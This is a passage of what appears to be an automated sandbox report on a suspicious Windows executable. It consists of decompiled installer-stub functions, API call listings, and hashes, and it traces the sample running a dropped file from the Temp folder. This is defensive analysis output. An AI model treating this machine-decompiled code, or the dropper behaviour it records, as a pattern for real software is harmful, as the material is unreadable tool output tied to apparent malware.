					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                          0x00405a4f
                          0x00405a56
                          0x00405a5a
                          0x00405a63
                          0x00405a67
                          0x00405ba6
                          0x00405ba6
                          0x00000000
                          0x00405ba6
                          0x00405a67
                          0x00405a73
                          0x00405a89
                          0x00405ab1
                          0x00405abc
                          0x00405ac0
                          0x00405ae0
                          0x00405ae2
                          0x00405ae7
                          0x00405af1
                          0x00405afe
                          0x00405b03
                          0x00405b08
                          0x00405b0c
                          0x00000000
                          0x00000000
                          0x00405b1b
                          0x00405b1d
                          0x00405b2a
                          0x00405b2e
                          0x00405b9f
                          0x00405ba0
                          0x00000000
                          0x00405b4a
                          0x00405b57
                          0x00405bbc
                          0x00405bc3
                          0x00405b6a
                          0x00405b6a
                          0x00405b6c
                          0x00405b75
                          0x00405b80
                          0x00405b92
                          0x00405b99
                          0x00000000
                          0x00405b99
                          0x00405bc5
                          0x00405bc6
                          0x00405bcb
                          0x00405bcd
                          0x00405bda
                          0x00405bda
                          0x00405bde
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405bcf
                          0x00405bcf
                          0x00405bd2
                          0x00405bd5
                          0x00405bd6
                          0x00000000
                          0x00405bcf
                          0x00405b62
                          0x00405b67
                          0x00000000
                          0x00405b67
                          0x00405b2e
                          0x00405a8b
                          0x00405a96
                          0x00405a9f
                          0x00405aa3
                          0x00000000
                          0x00000000
                          0x00405aa3
                          0x00405bb0

                          APIs
                            • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                            • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004057DE,?,00000000,000000F1,?), ref: 00405A96
                          • GetShortPathNameA.KERNEL32 ref: 00405A9F
                          • GetShortPathNameA.KERNEL32 ref: 00405ABC
                          • wsprintfA.USER32 ref: 00405ADA
                          • GetFileSize.KERNEL32(00000000,00000000,00422188,C0000000,00000004,00422188,?,?,?,00000000,000000F1,?), ref: 00405B15
                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405B24
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405B3A
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D88,00000000,-0000000A,00409424,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405B80
                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405B92
                          • GlobalFree.KERNEL32 ref: 00405B99
                          • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405BA0
                            • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                            • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                          • String ID: %s=%s$[Rename]
                          • API String ID: 3445103937-1727408572
                          • Opcode ID: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                          • Instruction ID: d3b858f9c50fd1002edea1203351e8dfee5eb830211114c78627ca8ef1b38bc0
                          • Opcode Fuzzy Hash: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                          • Instruction Fuzzy Hash: 2B41FF71A45A15BBD7206B619D49F6B3AACEF80754F140436FE05F22C2E67CBC018EAD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405D1D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E00405D1D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42375c; // 0x5c191b
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423fb8; // 0x5c11e0
				_t74 = _t73 + _t36;
				_t37 = 0x422f20;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422f20;
				if(_a4 - 0x422f20 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405D1D(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422f20;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405CFB(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405C59(_t86,  *0x423f88);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405F5D(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x424004;
						if( *0x424004 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f84; // 0x74581340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423fb8;
							E00405BE2(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423fb8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405D1D(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405CFB(_a4, _t37);
			}






























                          0x00405d1d
                          0x00405d1d
                          0x00405d1d
                          0x00405d23
                          0x00405d28
                          0x00405d2a
                          0x00405d39
                          0x00405d39
                          0x00405d3b
                          0x00405d44
                          0x00405d46
                          0x00405d4b
                          0x00405d4e
                          0x00405d4f
                          0x00405d56
                          0x00405d58
                          0x00405d5e
                          0x00405d61
                          0x00405d61
                          0x00405f3a
                          0x00405f3a
                          0x00405f3e
                          0x00000000
                          0x00000000
                          0x00405d6e
                          0x00405d74
                          0x00000000
                          0x00000000
                          0x00405d7a
                          0x00405d7b
                          0x00405d7e
                          0x00405d81
                          0x00405f2d
                          0x00405f37
                          0x00405f39
                          0x00405f39
                          0x00405f2f
                          0x00405f31
                          0x00405f33
                          0x00405f34
                          0x00405f34
                          0x00000000
                          0x00405f2d
                          0x00405d87
                          0x00405d8b
                          0x00405d9b
                          0x00405d9f
                          0x00405da6
                          0x00405da9
                          0x00405dad
                          0x00405db3
                          0x00405db6
                          0x00405db9
                          0x00405dbc
                          0x00405ed7
                          0x00405eda
                          0x00405f0a
                          0x00405f0d
                          0x00405f12
                          0x00405f16
                          0x00405f16
                          0x00405f1b
                          0x00405f1c
                          0x00405f21
                          0x00405f24
                          0x00405f26
                          0x00000000
                          0x00405f26
                          0x00405edc
                          0x00405edf
                          0x00405ef4
                          0x00405efb
                          0x00405ee1
                          0x00405ee8
                          0x00405ee8
                          0x00405f03
                          0x00405f06
                          0x00405ecf
                          0x00405ed0
                          0x00405ed0
                          0x00000000
                          0x00405f06
                          0x00405dc4
                          0x00405dc5
                          0x00405dcb
                          0x00405dcd
                          0x00405de7
                          0x00405de7
                          0x00405dee
                          0x00405dee
                          0x00405df5
                          0x00405df9
                          0x00405df9
                          0x00405dfa
                          0x00405dfc
                          0x00405e35
                          0x00405e38
                          0x00405e48
                          0x00405e4b
                          0x00405e53
                          0x00405e59
                          0x00405e59
                          0x00405eb5
                          0x00405eb5
                          0x00405eb7
                          0x00000000
                          0x00000000
                          0x00405e5d
                          0x00405e64
                          0x00405e65
                          0x00405e67
                          0x00405e81
                          0x00405e8f
                          0x00405e95
                          0x00405e97
                          0x00405eb2
                          0x00405eb2
                          0x00405eb2
                          0x00000000
                          0x00405eb2
                          0x00405e9d
                          0x00405ea8
                          0x00405eae
                          0x00405eb0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405eb0
                          0x00405e69
                          0x00405e6c
                          0x00000000
                          0x00000000
                          0x00405e7b
                          0x00405e7d
                          0x00405e7f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405e7f
                          0x00000000
                          0x00405eb5
                          0x00405e40
                          0x00000000
                          0x00405dfe
                          0x00405e03
                          0x00405e19
                          0x00405e1e
                          0x00405e21
                          0x00405ebe
                          0x00405ebe
                          0x00405ec2
                          0x00405eca
                          0x00405eca
                          0x00000000
                          0x00405ec2
                          0x00405e2b
                          0x00405eb9
                          0x00405eb9
                          0x00405ebc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405ebc
                          0x00405dfc
                          0x00405dcf
                          0x00405dd3
                          0x00000000
                          0x00000000
                          0x00405dd5
                          0x00405dd9
                          0x00000000
                          0x00000000
                          0x00405ddb
                          0x00405ddf
                          0x00000000
                          0x00405de1
                          0x00405de1
                          0x00000000
                          0x00405de1
                          0x00405ddf
                          0x00405f44
                          0x00405f4e
                          0x00405f5a
                          0x00405f5a
                          0x00000000

                          APIs
                          • GetVersion.KERNEL32(?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405DC5
                          • GetSystemDirectoryA.KERNEL32 ref: 00405E40
                          • GetWindowsDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,00000400), ref: 00405E53
                          • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8F
                          • SHGetPathFromIDListA.SHELL32(00000000,"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up), ref: 00405E9D
                          • CoTaskMemFree.OLE32(00000000), ref: 00405EA8
                          • lstrcatA.KERNEL32("C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ECA
                          • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405F1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                          • String ID: "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 900638850-4226685270
                          • Opcode ID: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                          • Instruction ID: bc679195f81621fcb390d0e71ed0d7b45f11abfd0e51c03931a277fa57cc5d3e
                          • Opcode Fuzzy Hash: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                          • Instruction Fuzzy Hash: A051F471A04A02ABEB256F24DC847BB3B74DB55315F50823BE991B62D0D33C4A42DF8E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405F5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00405F5D(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040585B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405819("*?|<>/\":", _t5))) == 0) {
							E00405993(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                          0x00405f5f
                          0x00405f67
                          0x00405f7b
                          0x00405f7b
                          0x00405f81
                          0x00405f8e
                          0x00405f8e
                          0x00405f8f
                          0x00405f91
                          0x00405f95
                          0x00405f97
                          0x00405fa0
                          0x00405fa2
                          0x00405fbc
                          0x00405fc4
                          0x00405fc4
                          0x00405fc9
                          0x00405fcb
                          0x00405fcd
                          0x00405fd1
                          0x00405fd2
                          0x00405fd5
                          0x00405fdd
                          0x00405fdf
                          0x00405fe3
                          0x00000000
                          0x00000000
                          0x00405fe9
                          0x00405fee
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405fee
                          0x00405ff3

                          APIs
                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\2022-571-GLS.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                          • CharNextA.USER32(?,"C:\Users\user\Desktop\2022-571-GLS.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                          • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\user\Desktop\2022-571-GLS.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-2660203143
                          • Opcode ID: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                          • Instruction ID: afd4a01125e034af7a3871a1a8bdb924777211b2e54028c3170dd0334d944cbd
                          • Opcode Fuzzy Hash: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                          • Instruction Fuzzy Hash: 7111B251808B962DEB3216384C44B777F9DCB967A0F5844BBE9C5722C2C67C9C438B6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040401E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0040401E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                          0x00404030
                          0x004040c4
                          0x00000000
                          0x004040c4
                          0x00404041
                          0x00404045
                          0x00000000
                          0x00000000
                          0x0040404b
                          0x00404054
                          0x00404057
                          0x00404057
                          0x0040405d
                          0x00404063
                          0x00404063
                          0x0040406f
                          0x00404075
                          0x0040407c
                          0x0040407f
                          0x00404082
                          0x00404084
                          0x00404084
                          0x0040408c
                          0x00404092
                          0x00404092
                          0x0040409c
                          0x004040a1
                          0x004040a4
                          0x004040a9
                          0x004040ac
                          0x004040ac
                          0x004040bc
                          0x004040bc
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                          • Instruction ID: 6c3acea846b2bea6830d2fc4e13120c874811c96ebe523463579326edd4eeab8
                          • Opcode Fuzzy Hash: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                          • Instruction Fuzzy Hash: AC2184B1904704ABC7319F78DD08B4B7BF8AF41714F048629EA95F22E0C734E904CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402692 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E00402692(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A0C(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E0040585B(_t52) == 0) {
					E00402A0C(0xffffffed);
				}
				E004059B3(_t52);
				_t27 = E004059D2(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f94; // 0x8400
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403207(_t47);
						E004031D5(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402F2E(_t49,  *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405993( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402F2E(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                          0x00402692
                          0x00402694
                          0x004026a0
                          0x004026a3
                          0x004026ad
                          0x004026b1
                          0x004026b1
                          0x004026b7
                          0x004026c4
                          0x004026cc
                          0x004026cf
                          0x004026d5
                          0x004026e3
                          0x004026e8
                          0x004026ec
                          0x004026ef
                          0x004026f8
                          0x00402704
                          0x00402708
                          0x0040270b
                          0x00402715
                          0x00402734
                          0x0040271c
                          0x00402721
                          0x00402729
                          0x0040272c
                          0x00402731
                          0x00402731
                          0x0040273b
                          0x0040273b
                          0x0040274d
                          0x00402754
                          0x00402766
                          0x00402766
                          0x0040276c
                          0x0040276c
                          0x00402777
                          0x00402778
                          0x0040277c
                          0x00402780
                          0x00402786
                          0x00402786
                          0x0040278d
                          0x0040217a
                          0x004028a4
                          0x004028b0

                          APIs
                          • GlobalAlloc.KERNEL32(00000040,00008400,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004026E6
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402702
                          • GlobalFree.KERNEL32 ref: 0040273B
                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040274D
                          • GlobalFree.KERNEL32 ref: 00402754
                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040276C
                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402780
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                          • String ID:
                          • API String ID: 3294113728-0
                          • Opcode ID: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
                          • Instruction ID: 9ca97f70dd32fe41b4909f681106d09eb720980563b4c140891508526f153775
                          • Opcode Fuzzy Hash: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
